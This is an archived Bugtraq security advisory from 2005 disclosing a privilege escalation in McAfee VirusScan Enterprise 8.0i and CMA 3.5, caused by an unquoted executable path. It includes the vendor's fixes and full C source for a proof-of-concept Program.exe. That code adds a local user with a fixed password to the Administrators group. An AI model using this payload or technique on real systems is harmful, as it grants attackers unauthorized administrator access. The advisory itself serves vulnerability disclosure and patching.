Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
From: Reed Arvin <reedarvin@xxxxxxxxx>
Date: Thu, 22 Dec 2005 10:16:09 -0700
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=VzQAhsNXiRz7cH8JA74mEnh2Gf5oxmNmFK5gULNtZQnPZMGlPVUbPS39mSz64fxf5RySdIJsCVme4UUjy2E9pVs/7JIFEy4GTyhR11qU1byjbAWTNdlX13BJXlOO3bbP3ov+9u1fNFt/QpUmVi7kljw0hdhZn20cEqBIoyTfXVU=
In-reply-to: <80115b690512220913m26a1d71eia3ca4e6e9ef52042@xxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <80115b690512220913m26a1d71eia3ca4e6e9ef52042@xxxxxxxxxxxxxx>

( Original article: http://reedarvin.thearvins.com/20051222-01.html )

Summary:
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11)
and CMA  3.5 (patch 5) (http://www.mcafee.com/)

Details:
By default the naPrdMgr.exe process runs under the context of the
Local System account. Every so often it will run through a process
where it does the following:

- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT

The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file.
Because of a lack of quotes the  naPrdMgr.exe process first tries to
run C:\Program.exe. If that is not found it tries to run C:\Program
Files\Network.exe. When that is not found it finally runs the
EntVUtil.EXE file that it was originally intending to run. A malicious
user can create an application named  Program.exe and place it on the
root of the C:\ and it will be run with Local System privileges by the
naPrdMgr.exe process. Source code for an example Program.exe is listed
below.

Vulnerable Versions:
McAfee VirusScan Enterprise  8.0i (patch 11) and CMA 3.5 (patch 5)

Patches/Workarounds:
The vendor has released knowledge base article kb45256 to address the issue.

Solution one from the vendor:
"This issue is resolved in Patch 12."

Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to
resolve the potential exploit. The new plugin is available as a HotFix
from McAfee Tier III Technical Support."

Exploits:

// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
    CHAR  szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

     GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program 
Pr0gr@m$$ /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup
Administrators Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/ )

Prev by Date: Re: Cisco PIX / CS ACS: Downloadable RADIUS ACLs vulnerability
Next by Date: iDefense Security Advisory 12.22.05: Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability
Previous by thread: CYBSEC - Security Advisory: httprint Multiple Vulnerabilities
Next by thread: iDefense Security Advisory 12.22.05: Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability
Index(es):
- Date
- Thread